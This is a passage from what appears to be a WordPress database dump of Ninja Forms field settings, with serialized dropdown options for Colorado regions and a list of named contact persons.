Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8657,166,'drawerDisabled','','drawerDisabled',''),(8658,167,'field_label','First Name','field_label','First Name'),(8659,167,'field_key','textbox_45','field_key','textbox_45'),(8660,167,'custom_name_attribute','','custom_name_attribute',''),(8661,167,'personally_identifiable','','personally_identifiable',''),(8662,167,'value','','value',''),(8663,168,'field_label','Last Name','field_label','Last Name'),(4704,159,'key','listselect_134','key','listselect_134'),(4705,159,'container_class','one-half first','container_class','one-half first'),(4706,159,'parent_id','15','parent_id','15'),(12179,379,'disable_input','0','disable_input','0'),(12178,379,'placeholder','','placeholder',''),(12177,379,'calc_option','0','calc_option','0'),(12176,379,'calc_auto_include','0','calc_auto_include','0'),(12174,379,'show_help','0','show_help','0'),(12175,379,'help_text','','help_text',''),(12173,379,'user_info_field_group','1','user_info_field_group','1'),(12171,379,'user_zip','0','user_zip','0'),(12172,379,'user_phone','0','user_phone','0'),(12118,378,'label_pos','above','label_pos','above'),(12119,378,'mask','','mask',''),(12120,378,'datepicker','0','datepicker','0'),(12121,378,'first_name','0','first_name','0'),(12122,378,'from_name','0','from_name','0'),(12123,378,'user_info_field_group','1','user_info_field_group','1'),(12124,378,'show_help','0','show_help','0'),(12125,378,'help_text','','help_text',''),(12126,378,'calc_auto_include','0','calc_auto_include','0'),(12127,378,'calc_option','0','calc_option','0'),(12128,378,'placeholder','','placeholder',''),(12129,378,'user_address_1','','user_address_1',''),(12130,378,'user_address_2','','user_address_2',''),(12131,378,'user_city','','user_city',''),(12132,378,'user_zip','','user_zip',''),(12133,378,'user_phone','','user_phone',''),(12134,378,'user_email','','user_email',''),(12135,378,'disable_input','0','disable_input','0'),(12136,378,'input_limit','','input_limit',''),(12137,378,'input_limit_type','char','input_limit_type','char'),(12138,378,'input_limit_msg','','input_limit_msg',''),(12139,378,'user_state','0','user_state','0'),(12140,378,'autocomplete_off','0','autocomplete_off','0'),(12141,378,'num_sort','0','num_sort','0'),(12142,378,'admin_label','','admin_label',''),(12143,378,'user_info_field_group_name','','user_info_field_group_name',''),(12144,378,'user_info_field_group_custom','','user_info_field_group_custom',''),(4738,162,'objectType','Field','objectType','Field'),(4739,162,'objectDomain','fields','objectDomain','fields'),(4740,162,'editActive','','editActive',''),(4741,162,'order','7','order','7'),(4742,162,'type','listselect','type','listselect'),(4743,162,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(4744,162,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4745,162,'label_pos','above','label_pos','above'),(4746,162,'list_type','dropdown','list_type','dropdown'),(4747,162,'multi_size','5','multi_size','5'),(4748,162,'list_show_value','1','list_show_value','1'),(4749,162,'list','a:0:{}','list','a:0:{}'),(4750,162,'user_info_field_group','','user_info_field_group',''),(4751,162,'calc_auto_include','0','calc_auto_include','0'),(4752,162,'user_state','0','user_state','0'),(4753,162,'num_sort','0','num_sort','0'),(4754,162,'admin_label','','admin_label',''),(4755,162,'show_help','0','show_help','0'),(4756,162,'help_text','','help_text',''),(4757,162,'show_desc','0','show_desc','0'),(4758,162,'desc_pos','none','desc_pos','none'),(4759,162,'desc_text','','desc_text',''),(4760,162,'element_class','','element_class',''),(4761,162,'required','1','required','1'),(4762,162,'options','a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Francis de Geus\";s:5:\"value\";s:28:\"ESAInitiator-Francis de Geus\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:2;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:23:\"Initiator-Vicki Cashman\";s:5:\"value\";s:23:\"Initiator-Vicki Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:24:\"Initiator-Helaine Reiner\";s:5:\"value\";s:24:\"Initiator-Helaine Reiner\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}','options','a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Francis de Geus\";s:5:\"value\";s:28:\"ESAInitiator-Francis de Geus\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:2;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:23:\"Initiator-Vicki Cashman\";s:5:\"value\";s:23:\"Initiator-Vicki Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 